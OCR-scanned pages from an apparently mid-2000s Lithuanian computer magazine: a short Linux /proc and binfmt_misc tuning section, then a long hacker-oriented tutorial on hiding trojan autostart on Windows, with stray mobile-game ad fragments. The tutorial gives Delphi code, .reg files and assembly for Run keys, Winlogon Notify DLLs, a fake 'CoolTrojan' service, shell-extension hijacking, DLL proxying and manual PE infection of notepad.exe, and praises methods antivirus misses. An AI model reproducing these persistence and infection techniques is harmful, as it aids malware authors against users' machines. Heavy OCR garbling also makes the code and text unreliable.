formaciją apie bylą ir interpretatorių tokiu formatu: “':pava- 
dinimas:tipas:poslinkis:magiškas skaičius:kaukė:ke- 
lias iki interpretatoriaus:". Jeigu „tipo“ laukas lygus M, tai 
bylos tipas nustatomas pagal magiškąjį skaičiu, esantį by- 
los viduje nurodytu poslinkiu. Priešingu atveju, jeigu „tipas“ 
lygus E, tai bylos tipas nustatomas pagal praplėtimą, įrašy- 
tą į lauką „magiškas skaičius“. Laukas „pavadinimas“ 
tai viso labo identifikatorius, o „kaukės“ laukas paprastai 
praleidžiamas. Žinodami visus aukščiau aprašytus dalykus, 
įvykdome komandą: 
cd /mt/other/windous/Programx Files/Ninamo/ 


1 
Toro 1012K 


jim users 4,0K 2005-08-28 15:54 / 

Jim users 4,0K 2005-08-22 20:10 / 

Jim users 2,3K 2005-08-28 15:54 > 

Jim users 37K 2005-08-22 20:10 tuno » 

Jim users 4,0K 2005-08-22 20:10 Plugins / 

Jim users 4,0K 2005-08-22 20:10 Skins / 

Jim users 25K 2005-08-22 20:10 whatsnew.txt 

Jim users 24K 2005-08-22 20:10 * 

Jim users 860K 2005-08-22 20:10 * 

Jim users 1,34 2005-08-26 15:54 Hinamp. ini 

Jim users 8,7K 2005-08-28 15:54 winamp .m3u 

Jim users 8,5k 2005-08-22 20:10 winampab ht 
1 Jim users 4,5K 2005-08-22 20:10 winamo.ą1 
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binfmt mise sistemos darbo pavyzdys 


Z acho -EXE-E-:0xe:;/us1/bin/wine:" > /proc/sys/ts/binfmt misC/registei 


Viskas, dabar jau gali bandyti, kaip pasileis tavo exe'kai. 


[Lavink atmintį] Keičiant /proc/sys/vm kataloge saugomas by- 
las, galima veikti virtualios atminties posistemės veikima. Kai 
kuriais atvejais ši įtaka yra ganėtinai naudinga taip galima 
padidinti sistemos našumą. 

2.4 šakos branduoliuose buvo numatyta galimybė keisti dau- 
gybę skirtingų virtualios atminties posistemės parametrų. 2.6 
šakos branduoliai tapo intelektualesniais, todėl dabar visai 
nebūtina rankiniu būdu tiuninguoti daugelį parametrų. Ta- 
čiau čia buvo palikta bdflush demono valdymo sąsaja, per 
kurią galima kontroliuoti „purvinų“ buferių įrašymo į diską pro- 
cesą. Visi jo konfigai yra keliose bylose su priešdėliu „dirty“. 
Byla dirty background ratio parodo „purvinų“ atminties pus- 
lapių kiekį (procentais nuo bendro atminties kiekio), kuriems 
susikaupus bdflush turi pradėti rašymą į diską. Kiekvienas 
procesas gali pats, nedalyvaujant bdflush, įrašyti duomenis 
atgal į diską. Byla dirty ratio parodo puslapių kiekį, kuriems 
susikaupus procesas turėtų pats pradėti įrašymą į diską. In- 
tervalą tarp demono bdflush pažadinimų galima pakeisti per 
bylą dirty writeback centisecs (šimtųjų sekundės dalių tiks- 
lumu). Pačių buferių „senėjimo“ laikas kontroliuojamas per 
bylą dirty expire centisecs (ir vėlgi šimtųjų sekundės dalių 
tikslumu). 

Padidinus bylose dirty background ratio ir dirty expire centi 
secs saugomas reikšmes, mes galime pasiekti to, kad „purvi- 
nų“ buferių rašymas į diską bus atliekamas rečiau, kas padi- 
dins sistemos reagavimo laiką, tačiau pats rašymas vyks i|- 
giau. Ir atvirkščiai, mažesnės dirty background ratio, dirty wri- 
teback centisecs, dirty expire centisecs reikšmės leis OS to- 
lygiau paskirstyti įrašymo į diską operacijas. 


[/proc/sys/dev skurdas] Šiuo metu vienintelis įrenginys, 
kurį galima valdyti per /proc/sys/dev, yra CD-ROM. Atitinka- 
mai, visi nustatymai saugomi kataloge cdrom. Beje, rašy- 
mas į bylą info negalimas, nes ji skirta gauti įrenginio para- 
metrus. Likusios bylos leidžia kontroliuosi sistemos elgse- 
ną CD-ROM atžvilgiu. Pavyzdžiui, į bylą /ock įrašęs nulį, tu 
gausi galimybę atidaryti įrenginio stalčiuką tuo metu, kai 
sumontuota disko failų sistema. Kaip pats supranti, tokiu 
atveju sistemos elgsena nenuspėjama, todėl aš to daryti 
nerekomenduoju. O bylų 
autoclose ir autoeject 
- ha pakeitimas gali pasirody- 
įvė £ 0f slot ti esąs naudingas. Jeigu 
cen tray: tu į pirmąją bylą įrašysi 

; vienetą, tai OS pati už- 
darys įrenginio stalčiuką, 

kai tu montuosi diską, 0 

vieneto įrašymas į antrą- 

ją bylą reiškia automati- 

nį įrenginio stalčiuko ati- 

1 darymą po demontavi- 
mo. Mano nuomone, ge- 
riausia būtų įjungti abi 


L] šias opcijas. 
Štai kaip atrodo informacija apie CD-ROM įrengin 
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paleidimo Metodai 


YRA DAUG BŪDŲ, KAIP SISTEMOS PALEI- 
DIMO METU KARTU PALEISTI IR TROJANĄ. 
KAI KURIE IŠ JŲ JAU SENIAI NAUDOJAMI 
IR VISIEMS ŽINOMI, O KAI KURIE ĮDARBI- 
NAMI LABAI RETAI IR JŲ PRAKTIŠKAI NIE- 
KAS NEAPTINKA. JEIGU HAKERIS SAVO 
TROJOS ARKLĮ KURS PROTINGAI, NIEKU 
GYVU NENAUDOS SENŲ IR VISIEMS ŽINO- 
MŲ METODŲ — JIS ARBA SUGALVOS KĄ 
NORS PATS, ARBA PASINAUDOS KOKIU 
NORS NAUJU, PRIVACIU ARBA NELABAI 
PAPLITUSIU BŪDU. PABANDYKIME PAZIŪ- 
RĖTI, KĄ RINKTIS TIKRAM HAKERIUI. 


Aiškinamės automatinio paleidimo realizaciją 
[Senoviniai metodai] Pradėsiu nuo senovinių, seniai visiems 
žinomų ir plačiai naudojamų metodų. Tai, be abejo, nuorodos 
įrašymas į „Startup“ katalogą ir parametrų sukūrimas šiose sis- 
teminio registro šakose: HKEY CURRENT USER|Software|Mic- 
rosoft|Windows|CurrentVersion|Run ir HKEY LOCAL MACHI- 
NE|SOFTWARE|Microsoft| Windows|CurrentVersion|Run. Kaip tu 
tikriausiai pats supranti, pirmasis metodas visiškai netinka au- 
tomatiniam trojano paleidimui. Taip niekas nedarys vien todėl, 
jog toks metodas aptinkamas vos keletą kartų spragtelėjus pe- 
le: Start -> Programs -> Startup. Registro panaudojimo meto- 
das yra kone labiausiai paplitęs iš visų, kadangi naudojamas 
trojanuose, pradedant nuo pat jų atsiradimo. Aukščiau pateik- 
tose registro šakose yra Explorer paleidžiamų bylų sąrašai. Pir- 
moji šaka skirta konkrečiam vartotojui, o antroji galioja visai 
sistemai (ir visiems vartotojams), todėl norint į ją pridėti įrašą, 
prireiks administratoriaus arba bent jau Power User teisių. Pri- 
dėti savo parametrą galima labai lengvai, panaudojus objektą 
TRegistry, tačiau hakeris savo programas stengiasi padaryti kuo 
mažesnes, todėl naudoja išskirtinai gryną API. Bylos įrašymas į 
Explorer'io automatinio paleidimo sarašą gali atrodyti štai taip: 


Procedure InstallTrojon; 
vai 


Key: hkey; 
TrName: PChar; 
St: TStartuplnto; 
Pr: TProcesslnformation; 
SystemPath: array [0..MAX PATH] of Char; 
begin 
GetSystemDirectory(SystemPath, MAX PATH); 
if RegOpenKeyEx(HKEY LOCAL MACHINE,  'SOFTWAREMicrosofi WindowsCurrentVer- 
sionRun", 0, 
KEY CREATE SUB KEY or KEY SET VALUE, Key) — ERROR SUCCESS then 
begin 
RegSeiValueEx(Key, KeyNlame, 0, REG SZ, Exelame, Istrlen(ExeNlame) + |); 
Reg(loseKey (Key); 
and; 
end; 


Šiame kode KeyName -— tai kuriamo rakto pavadinimas, o Exe- 
Name — kelias iki kraunamos bylos. Šį automatinio paleidimo 
metodą žino net ir pats bukiausias vartotojas, 0 ir antivirusai 
seniai jau išmoko stebėti registro Run šakas bei perspėti varto- 
tojus apie naujas užkraunamas bylas. Be abejo, galima būtų į 
sąrašą savo įrašo ir neįtraukti, o tiesiog pakeisti jau egzistuo- 
jantį, tai tikriausiai sukeltų mažiau įtarimų vartotojui, bet nuo 
perspėjančio apie visus pasikeitimus antiviruso tai neišgelbės. 
Taigi jeigu jau naudoji šį metodą, geriau tai daryk tik taikomo- 
siose programose, o kuriant trojanus hakeriui jį geriau pamiršti. 


[Paleidimas iš,Winlogon“] Jeigu pradėtume ieškoti labiau ne- 
pastebimų automatinio paleidimo per sisteminį registrą vietų, 
tai paaiškėtų, jog jų čia devynios galybės. Pradžiai aptarkime 
šaką HKEY LOCAL MACHINE|SOFTWARE|Microsoft|Win- 
dowsNT|CurrentVersion|Winlogon|Notify, kurioje saugomi win- 
logon.exe proceso užkraunamų DLL sąrašai, kai sistemoje įvyksta 
tam tikri įvykiai. | šią registro šaką įrašyti nuosavą DLL — neblo- 
gas automatinio paleidimo būdas. Vienas iš jo privalumų tas, 
jog mūsų DLL gali būti paleista kraunantis sistemai System pro- 
ceso vardu. Tuo pačiu hakeris gauna pilną priėjimą prie siste- 
mos, tiesa, jis netenka priėjimo prie šifruotų vartotojo bylų (NTFS 
failų sistemoje). Apeiti šį apribojimą jis gali paleidęs DLL prieš 
vartotojui įeinant į sistemą (su įjungta impersonalizacija) arba 
įsiterpęs į vartotojo procesą. Hakeriui taip pat bus naudinga tai, 
Jog vienoje DLL galima apibrėžti keletą funkcijų, kurios bus iš- 
kviečiamos priklausomai nuo skirtingų sisteminių įvykių, pavyz- 
džiui, paleidus sistemą arba prisijungus vartotojui. Taigi norint 
paleisti savo DLL, mums reikia Winlogon|Notify šakoje sukurti 
savo šaką su laisvai pasirinktu vardu. Būtini šios šakos para- 
metrai yra Asynchronous, DIIName, Impersonate ir vienas arba 


keletas parametrų, atsakančių Už įvykį, kurio metu ir bus Už- 
krauta ši DLL. Parametras Asynchronous (REG DWORD) api- 
brėžia funkcijos iškvietimo iš DLL tipą. Jeigu jo reikšmė O, funk- 
cijos bus iškviečiamos iš pagrindinio winlogon.exe proceso srau- 
to, 0 sistemos užkrovimas negalės būti pratęstas iki tol, kol 
funkcija nesugrąžins valdymo. Jeigu jo reikšmė 1, tai funkcija 
bus iškviesta asinchroniškai, atskirame sraute, iš ko išplaukia, 
jog ji galės sistemai niekada negrąžinti valdymo. Parametras 
DIIName apibrėžia kelią iki užkraunamos DLL. Jeigu DLL yra 
sisteminiame kataloge, tai galima aprašyti tik jos pavadinimą. 
Parametras impersonate apibrėžia srauto, kuriame bus iškvies- 
ta mūsų funkcija, priėjimo teises. Jeigu jo reikšmė O, srautas 
gaus sistemines teises, o jeigu 1 — vartotojo, su kuriuo susijęs 
įvykęs įvykis, teises. Dabar aptarkime įvykių tipus ir juos atitin- 
kančių sisteminio registro raktų pavadinimus. 


Logon — vartotojo įėjimo į sistemą įvykis, jį naudoti prasminga 
tuomet, kai veiksmą reikia atlikti vartotojo vardu. 

Logoff — vartotojo išėjimas iš sistemos. 

ScreenSaver — ekrano užsklandos paleidimas, derėtų naudoti 
tada, kai reikia atlikti didelį sistemos apkrovimą sukeliančius (iš 
ko išplaukia, jog ir pastebimus vartotojui) veiksmus. 
StopScreenSaver -— ekrano užsklandos darbo pabaigimas. 
Shutdown — sistemos darbo užbaigimas, šiam įvykiui galima 
priskirti kokių nors duomenų išsaugojimą. 

StartShell — aplinkos paleidimas, įvyksta paleidžiant explo- 
rer.exe. Atkreipk dėmesį, jog šis įvykis nėra tolygus Logon, ka- 
dangi jis gali būti iškviestas keletą kartų dėl aplinkos perkrovi- 
mo, einančio po iškilusių problemų (explorer.exe lūžimų). 
PostShell — įvykis po aplinkos paleidimo. 

Startup — sistemos paleidimas, greičiausiai hakeris trojano pa- 
leidimui naudos būtent šį įvykį. Derėtu pastebėti, jog su šiuo 
įvykiu susieta funkcija visada bus iškviečiama sistemos vardu, 
nepriklausomai net nuo Impersonate parametro reikšmės. 
Lock — darbo stoties užrakinimo įvykis, kuris įvyksta keičiantis 
vartotojams, neišeinant jiems iš sistemos, arba užrakinant dar- 
bo stotį klavišų kombinacija Win+L (Windows XP). 

Unlock -— darbo stoties atblokavimas arba persijungimas į kitą 
prie sistemos prisijungusį (logged on) vartotoją. 

Disconnect — darbo stoties išėmimas iš domeno. 
Reconnect — darbo stoties įtraukimas į domeną. 


Kaip matai, įvykių rinkinys ganėtinai platus, ir kiekvienam iš jų 
galima priskirti savo apdorotoją. Tai leis sekti vartotojo veiks- 
mus ir pasirinkti tinkamiausią vienos ar kitos trojano funkcijos 
paleidimo akimirką. 

Štai, pavyzdžiui, DLL išeities tekstas, įeinant vartotojui į siste- 
mą System vardu paleidžiantis notepad.exe: 


library Run; 
USS 
windows; 
procedure ExecuteNotepad(); 
vai 
St: TStartupinfo; 
Pr: TProcesslnformation; 


begin 
ZeroMemory((oDSt, Size0f(St)); 
St. :— Size0f(St); 
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St.lpDesktop :— PChar('winstoaO default“); 
CreateProcess(nil, notepad.exe“, nil, nil, false, O, nil, nil, St, Pr); 
end; 
exports 
ExecuteNotepad; 
begin 
end. 


Šioje DLL yra tik viena funkcija — ExecuteNotepad, kuri susie- 
jama su Logon įvykiu. Norint ją įdiegti, reikia šią DLL nukopijuoti 
į Įwindowslsystem32 katalogą bei paleisti štai tokio turinio REG 
bylą (manau, jog šios bylos turinys tau puikiai suprantamas ir 
be mano komentarų): 


Windows Registry Editor Version 5.00 

[HKEY LOCAL MACHINESOFTWAREMicrosofi Windows NTCurrentVersionNWinlogonNoti- 
fun] 

“Asynchronous" = dword:00000001 

“Impersonate" = dword:00000000 

“DllNome" ="run.dll" 

“Logon" = "ExecuteNotepad" 


Šio metodo trūkumas tame, jog registro šaka, kurioje aprašytas 
trojanas, dokumentuota MSDN'e, iš ko išplaukia, jog kai kurie 
vartotojai kartais ją gali patikrinti. Tačiau net nepaisant to šis 
metodas suveikia 9996 atvejų, kas parodo jo ganėtinai didelį 
patikimumą. 

Norint automatinį paleidimą paslėpti dar geriau, hakeriui vertė- 
tų savo dėmesį atkreipti į registro šaką HKEY LOCAL MACHI- 
NEISOFTWARE|Microsoft| Windows NT|CurrentVersion|Winlo- 
gon|GPExtensions. Joje saugomi po saugumo grupinės politikos 
apdorojimo Winlogon užkraunami DLL sąrašai. Šioje šakoje taip 
pat galima įkurdinti trojaną, tačiau čia problema tame, jog sau- 
gumo politikos nustatymus vartotojai keičia labai retai, todėl 
tikimybė, kad toks automatinio paleidimo metodas iš viso kada 
nors suveiks — labai menka ;). Kaip ten pridėti savo DLL? Tai 
galima labai lengvai suprasti pažiūrėjus į jau egzistuojančius 
įrašus. 

Bet ir taip, kaip sakoma, dar ne viskas. Winlogon'e daugybė 
vietų, iš kurių realu paleisti trojaną. Pažiūrėk viena šaka aukš- 
čiau, HKEY LOCAL MACHINE|SOFTWARE|Microsoft|Windows 
NT CurrentVersion|Winlogon šakoje yra du nuostabūs paramet- 
rai: Shell ir Userinit. Pirmame paprastai saugomas aplinkos by- 
los, kuri paleidžiama po įėjimo į sistemą, pavadinimas (papras- 
tai explorer.exe), o antrame — kelias iki programos, kuri po 
vartotojo įėjimo į sistemą inicializuoja jo profilį (paprastai useri- 
nit.exe). Taip į Shell galima įrašyti kelią iki savo trojano, kuris 
pats paleis aplinką. Bet tai ne pats geriausias būdas. Kur kas 
daugiau galimybių suteikia Userinit parametras. Pagrindinė jo 
savybė ta, jog su juo galima paleisti ne vieną, o iš karto keletą 
programų — pakanka jas tiesiog atskirti kableliais. Realybėje 
tai gali atrodyti štai taip: Userinit = Userinit.exe, trojan.exe. 
Visa tai veiks tiesiog nuostabiai! 

Hakeriui taip pat gali praversti UlHost ir VmApplet parametrai. 
Pirmajame saugomas programos, atvaizduojančios įėjimo į Win- 
dows dialogą, pavadinimas (tik XP), o antrajame — ActiveX Con- 
trol bibliotekos pavadinimas, kuri paleidžiama atidarius valdy- 
mo skydelį (Control Panel). Logiška, jog ir šiuos parametrus ga- 
lima gana neskausmingai pakeisti. 


[Explorer Shell Extentions] Kaip tu tikriausiai pastebėjai, kai 
kurios programos į kontekstinį vartotojo aplinkos (explorer.exe) 
meniu prideda savo pasirinkimus. Ar niekada nesusimąstei, kaip 
jos tai daro? Iš tiesų viskas pakankamai paprasta, Windows turi 
Explorer Shell Extentions mechanizmą, kuris leidžia praplėsti prak- 
tiškai bet kokį vartotojo aplinkos meniu. Tam reikia sukurti savo 
DLL ir aprašyti ją atitinkamoje sisteminio registro vietoje. Iškvie- 
tus atitinkamą kontekstinį meniu, bus užkrauta ši DLL ir jai per- 
duotas valdymas. Niekas hakeriui netrukdo ten aprašyti trojano 
DLL, beje, čia nė nereikia kurti naujų meniu punktų — pasirodo, 
tai nėra būtina. Tokių DLL sąrašas saugomas registro šakoje 
HKEY CLASSES ROOTlDirectory|shellex|ContextMenuHandlers. 
Kiekvienai DLL ten sukuriama sava šaka, kurioje parametras pa- 
gal nutylėjimą yra tam tikras unikalus CLSID. Pati DLL aprašoma 
registro šakoje HKEY CLASSES ROOTCLSID. Tarkim, hakeriškos 
DLL CLSID bus EBDF1F20-C829.-9999-8233- 
0020AF3E97A9, tuomet jos automatiniam paleidimui reikia su- 
kurti šaką HKEY CLAS-SES ROOTICLSID|(EBDF1F20-C829- 
9999-8233-0020AF3E97A9)|-InprocServer32. Parametras 
pagal nutylėjimą turi būti kelias iki DLL, Taip pat reikės sukurti 
parametrą ThreadingModel! ir jo reikšmę nurodyti Apartment. Ki- 
tas skyrius, kur hakeriui reikės aprašyti savo DLL — HKEY CLAS- 
SES ROOT1*|shellex|ContextMenuHandlers. Jis apibrėžia Shell Ex- 
tention, įvykdomą rodant kontekstinį meniu ant bet kokios bylos. 
Galiausiai norint įdiegti savą kontekstinio meniu praplėtimą, o 
tiksliau šnekant, trojano automatinį paleidimą, hakeriui terei- 
kia įvykdyti štai tokio turinio REG bylą: 


Windows Registry Editor Version 5.00 

[HKEY CLASSES ROOTVCLSIDŲ EBDFIF20-C829-9999-8233-0020AF3E97A9 NnprocSer- 
ver32] 

(D ="trojan.dll" 

“ThreadingModel" ="Apartment" 

[HKEY CLASSES ROOTV shellesAContextMenuHandlersVCoolTrojan] 

(0 =" (EBDFI F20-C829-9999-8233-0020AF3E97A91" 

[HKEY CLASSES ROOTWirectorytshellexAContextMenuHandlersCoolTrojan] 

(0="(EBDFF20-C829-9999-8233-0020AF3E97A9)" 


Šį automatinio paleidimo metodą iš visų išvardintų aš laikau 
perspektyviausiu. Daugelis vartotojų nė nenumano apie jokius 
Shell Extention, o tie, kurie apie juos žino, vargu ar sugebės 
surasti trojaną tarp daugybės kitų programų sukurtų įrašų. Di- 
delis šio metodo privalumas ir tame, jog apie jį antivirusai nieko 
nežino, atitinkamai pridedant savą Shell Extention, jie vartotojui 
nepateikia jokių perspėjimų. 

Sisteminiai servisai 

Windows NT sistemoje be vartotojiškų programų yra dar ir siste- 
miniai servisai (tarnybos). Tai programos, kurios paleidžiamos 
prieš vartotojui įeinant į sistemą ir kurios veikia nepriklausomai 
nuo jo veiksmų. Savaime suprantama, čia taip pat galima at- 
rasti vietelę trojanui paleisti. Įdiegtų servisų sąrašas saugomas 
registro šakoje HKEY LOCAL MACHINE|SYSTEM|CurrentControl- 
Set|Services. Kiekvienam servisui sukuriama sava registro ša- 
ka, o joje yra šie raktai: 

DisplayName — serviso pavadinimas, kuris atvaizduojamas per 
tarnybų administravimo mmc konsolę. Kad trojanas nebūtų ap- 
tiktas, hakeriai čia įrašo ką nors tokio, kas būtų maksimaliai 
panašu į tiesą. 

ErrorControl — serviso klaidų kritiškumas sistemos darbui. Pa- 


prastai šis parametras yra lygus nuliui. 

ImagePath — kelias iki vykdomos serviso bylos. 

ObjectName — vartotojo, kurio vardu bus paleistas servisas, 
vardas. Įdomiausia čia įrašyti LocalSystem. 

Start — paleidimo tipas. Norint servisą automatiškai paleisti 
kartu su sistema, čia reikia įrašyti 2. 

Type — serviso tipas. Šis parametras atskiria servisus nuo tvar- 
kyklių (drivers). Norint automatiškai paleisti kokią nors progra- 
mą, čia derėtų įrašyti 16, kas reikš, jog tai Win32 tipo servisas. 


Apibendrinant aukščiau išsakytus dalykus, galima aprašyti ser- 
visą įdiegiančią REG bylą: 


Windows Registry Editor Version 5,00 

[HKEY LOCAL MACHINENSYSTEMMCurrentContralSa! Services CoolTrojan] 
"Type" =dword:00000010 

"Start" = dword:00000002 

“ErrorControl" = dword:00000000 

“ImagePath" ="CAWINDOWSsystem32Mrojan.exe" 

"DisplayName" ="CoolTrojan" 

"ObjectName" = "LocalSystem" 


Nukopijavus trojan.exe bylą į WINDOWS|system32 katalogą ir 
įvykdžius šią REG bylą, trojanas bus įdiegtas į sistemą. Jis bus 
paleistas po kito sistemos perkrovimo. 
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0010E00 6872 3A01 01FF 15CC 1000 0168 805A 
1100 Gi6A 0168 BA3A 0101 
00010E20|E978 39FF FFRO 0000 0000 0000 0000 
0010E306 0000 0000 0000 0000 00600 0000 0000 
0010E40 0090 0000 6000 0000 0000 0000 0C00 0000 
00616E50 0000 0000 0000 0800 0000 0000 0000 0000 
0010E60 0000 0000 0080 0000 0800 0000 AAAG ABBA L LL 
00010E70 0000 6B65 726E 6560 3332 2E64 6C6C 0G00į,..„kernei32.dll.. 
0010E80 5769 6E45 7865 6300 0000 6361 6063 2E65|WinExec..„calc.» 
2010E90|7865 00006 6000 0000 0000 00006 0000 0000 
0010EAO 0000 00006 0000 0000 0000 0000 0000 0600 
00010EBO [0000 0000 0000 0060 Ūū00 0000 0006 A000!, 
D0519ECO 10006 A000G 0G0C 0800 GAA0 OLDA GA00 00001. 
0010EL6 00600 6006 6000 00006 0000 0000 0000 1000;. 
9800 0000 0000 d060 00060 0000 0000 0000 
ū010EFG | 0000 0000 00006 G0A0 6000 0000 0000 
006010F60 0000 0000 Ddū60 00006 00006 0000 0000 
00010F10 0000 0006 6600 6006 0000 0000 L000 
0610F20 0000 0000 0000 1008 dd0dA VAAO 0ACL 
6010F30|00006 0000 0000 6080 0000 0000 0000 
00010F46 6000 0000 (006 5000 0ūAU 0000 L0LA 
0010F50 0000 0000 6080 A000 0000 0000 GAAL 
6010F60 0000 0000 0005 6000 000 DOAO A0GA 
0610F70|0000 0000 0000 000 0200 0000 L000 
00010F80 (00006 0000 60006 6000 0000 1000 000A 
000616F30 0000 0000 0000 0006 0006 0000 0000 
00010FA0 0600 0000 0000 0060 0000 0000 OOC O 
NAniaFRAinaAA Anna AAAn Anan Anan Mana AAA Ana 


Ready 


dependenčy>..</a 


0600 


Sukuriame vietą byloje 


BT- Geras.com 


Šį metodą paprasta panaudoti ir jis gali pasirodyti visai neblo- 
gai, tačiau protingas administratorius visada patikrina įdiegtų 
servisų sąrašus, tokiu atveju hakeris ir gali būti aptiktas. 


[Kelios sisteminio registro vietos] Pakankamai įdomus sis- 
teminio registro parametras automatinio paleidimo atžvilgiu 
yra Applnit DLLs iš HKEY LOCAL MACHINE|SOFTWARE|Mic- 
rosoft| Windows NTlCurrentVersion|Windows šakos. Šiame pa- 
rametre saugomas su bet kokiu procesu, kuris naudoja 
user32.dll (o tokių dauguma), užkraunamų DLL bibliotekų są- 
rašas. Hakeriui labai praverstų į šią šaką įrašyti trojano DLL, 
ypač jeigu jam reikia, kad hakeriška biblioteka veiktų vienu 
metu visuose sistemoje paleistuose vartotojo procesuose. Tie- 
sa, į tokios DLL programavimą derėtų žiūrėti ypatingai atsar- 
giai, kadangi čia mažiausia klaida gali sukelti visos sistemos 
lūžimą. Dar viena nuostabi automatiniam paleidimui skirta vie- 
ta — tai registro šakoje HKEY LOCAL MACHINE|SYSTEM|Con- 
trolSet|Control|Session Manager esantis parametras BootE- 
xecute. Jame saugomas sistemos paleidimo metu vykdomų 
programų, kurios paleidžiamos prieš posistemės serverio 
(csrss.exe) paleidimą, sąrašas. Čia pagal nutylėjimą įrašyta 
autocheck autochk *. Šios registro šakos panaudojimas savo 
reikmėms apsunkintas tuo, jog šioje sistemos krovimosi sta- 
dijoje dar neprieinamos Win32 API funkcijos, todėl programo- 
je turi būti naudojama TIKTAI Native API, o importo lentelėse 
neturėtų būti nieko, išskyrus ntdll.dll. Nepasiruošusiam žmo- 
gui, kuris naudojasi standartiniais metodais, parašyti tokią pro- 
gramą nepavyks, tačiau jeigu perskaitytumei mano straipsnį 
„Delphi visagalis“ (jį gali rasti mūsų žurnalo 33 numeryje, iš- 
leistame vasario mėnesį), tokių problemų neiškiltų. 


[Bylų užkrėtimas ir pakeitimas] Vienas iš vartotojui ir admi- 
nistratoriui nepastebimiausių automatinio paleidimo būdų yra 
vienos iš užkraunamų bylų pakeitimas sava, su po to einančiu 
originalios bylos paleidimu. Tokiu atveju hakeriui iš pradžių rei- 
kia pervadinti pakeičiamą bylą, 0 po to vietoje jos įrašyti savą. 
Paprasčiausia tai padaryti su exe bylomis, tačiau, mano nuo- 
mone, gerokai įdomiau pakeisti DLL. Tai šiek tiek sudėtingiau, 
tačiau aptikti tokį pakeitimą kur kas sunkiau. Pakeičianti DLL 
funkcijas turi eksportuoti tais pačiais vardais, kaip ir originali 
DLL. Tokį eksportą paprasčiausia realizuoti visas pakeičiamos 
DLL funkcijas aprašant kaip external. Kad tu galėtumei geriau 
suprasti pakeitimo mechanizmą, žemiau aš pateiksiu DLL pa- 
vyzdį, kuriuo galima pakeisti HKEY LOCAL MACHINE|SOFTWA- 
REWMicrosoft| Windows NT|CurrentVersion|Winlogon|Noti- 
fylselgntfy šakoje aprašytą sclgntfy.dll, prieš tai ją pervadinus į 
selgntfi.dll. 


library sclgntty; 
procedure WLEventLogoff; external "sclgntfi.dll'; 
exporls 
WLEventLogoff; 
begin 
end. 


Iškvietus funkciją WLEventLogoff, ši DLL tiesiog perduoda valdy- 
mą originaliai DLL bibliotekai. Bet kaip tu tikriausiai supranti, 
hakeris tarp begin ir end gali įrašyti savo kodą, kuris bus įvykdy- 
tas jos užkrovimo metu. 


65) 
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Originalios bylos galima ir nekeisti 
savąja bei tiesiog pasinaudoti vi- 
rusų kūrimo metodika — praplės- 
ti paskutinę bylos PE sekciją ir ten 
įrašyti savo kodą, kuris paleis tro- 
janą ir perduos valdymą į origi- 
nalų įėjimą tašką. Pabandykime 
tai padaryti rankiniu būdu, kad 
geriau suprastume hakerio veiks- 
mus. Tam iš Windows XP paimki- 
me paprasčiausią notepad.exe ir 
pabandykime į jį įrašyti papildo- 
“6 mą kodą, kuris paleistų skaičiuotuvą (calc.exe). 
Iš pradžių atidarome bylą su Hex Workshop (arba su bet kokiu 
kitu HEX redaktoriumi) ir į jos pabaigą pridedame 1000h baitų 
nuliukų. 
Po to atidarome bylą su PE Tools ir nuspaudžiame mygtuką Sec- 
tions, sąraše surandame paskutinę sekciją (šiuo atveju tai bus 
„rsrc) ir tūkstančiu (1000) padidiname jos VirtualSize bei Raw- 
Size. Toliau mums reikia iš naujo apibrėžti PE bylos įėjimo tašką 
Į išskirtą sritį. Tam pažiūrime į šios srities poslinkį byloje (su 
(Hex Workshop) ir nuspaudžiam PE Tools mygtuką FLC, kur mums 
reikia gautą File Offset perskaičiuoti į Relative Virtual Address. 
Mano gauta reikšmė — 13A00. Spaudžiam mygtuką Optional 
Header, kur įėjimo tašką (Entry Point) pakeičiame į gautą reikš- 
mę. Prieš tai reikia išsaugoti senąją reikšmę, kadangi jos mums 
prireiks šiek tiek vėliau. Taigi norėdami perskaičiuoti PE bylos 
dydį, spaudžiame šalia SizeOflmage esantį mygtuką „?“ (be to ji 
nepasileis). 
Dabar mums prireiks OllyDbg derintuvo, kuriame mes ir įrašysi- 
me notepad.exe paleidžiantį kodą. Atidarome bylą derintuve ir 
sustojame ties nauju įėjimo tašku — nuo šio adreso mes ir 
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Bylos redagavimas su PE Tools 


įdiegsime naująjį kodą. Duomenis įkurdinsime šiek tiek žemiau. 
Skaičiuotuvui paleisti mums reikalingas maždaug toks kodas: 


push ofise! "kernel32.dll" 
call GetModuleHandleA 
push | offset WinExec 
push e0x 
call GetProcAddress 
push 1 
push  offset 'calc.exe' 
call eax 


Iš pradžių reikia importo lentelėje surasti mums reikalingų funk- 
cijų adresus. Importo lentelė pas mus yra adresu 1001000. 
Surandame šią vietą derintuve ir užsirašome adresus. Pas mus 
turėtų gautis kažkas panašaus į: 


010010CC — GetModuleHandleA 
01001110 -— GetProcAddrass 


Dabar mums reikalingas eilutes galima surašyti išskirtoje srityje 
ir sukurti užkroviklio kodą. Užkroviklio pabaigoje turėtų būti ko- 
manda perėjimui į originalų įėjimo tašką. Po to, kai tavo kodas 
pradės pasileidinėti, jį su Hex Workshop reikia įrašyti į bylą. 
Toks trojano automatinio paleidimo metodas teisingai jį panau- 
dojus gali būti iš tiesų nepastebimas. 


[Kaip pasirinkti savo automatinio paleidimo metodą Tikras 
ir iš tiesų ne iš kelmo spirtas hakeris niekada nesinaudos aukš- 
čiau aprašytais ir iš viso jokiais jau žinomais metodais. Jis auto- 
matiniam savo kūrinio paleidimui būtinai sugalvos ką nors origį- 
nalaus. Kaip jis tai padarys? Veikiausiai iš pradžių atsidarys re- 
gedit ir visame sisteminiame registre paieškos parametrų pagal 
kaukę *.exe;*.dll. Peržiūrėjęs surastas šakas ir šiek tiek pasu- 
kęs galvą jis lengvai suras vietą, kurioje bus galima įrašyti troja- 
ną. Jeigu jam to pasirodys maža, peržiūrės sistemoje paleistus 
procesus bei užkrautas bibliotekas ir pabandys nustatyti kiek- 
vienos bylos užkrovimo priežastį, kad galbūt po to ką nors pa- 
keistų. Žodžiu, automatinio paleidimo metodų jis dar gali su- 
galvoti labai daug, o mums telieka būti atidesniems. 


Rašome užkrovėjo kodą 
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Pagrindinis šio žaidimo veikėjas 
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Įsitikinkite, kad įjungta GPRS paslauga. Netinka PILDYK ir MAŽYLIO vartotojams. Žinutę su kodu nusiųskite | numerį 1344 
Jei dėl kokių nors priežasčių nepavyktų žaidimą atsisiųsti iš pirmojo karto, nuoroda bus išsaugota Jūsų telefone 
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įsitikinkite, kad įjungta ir veikia telefono GPRS paslauga ši paslauga netinka PILDYK ir MAŽYLIO vartotojams 


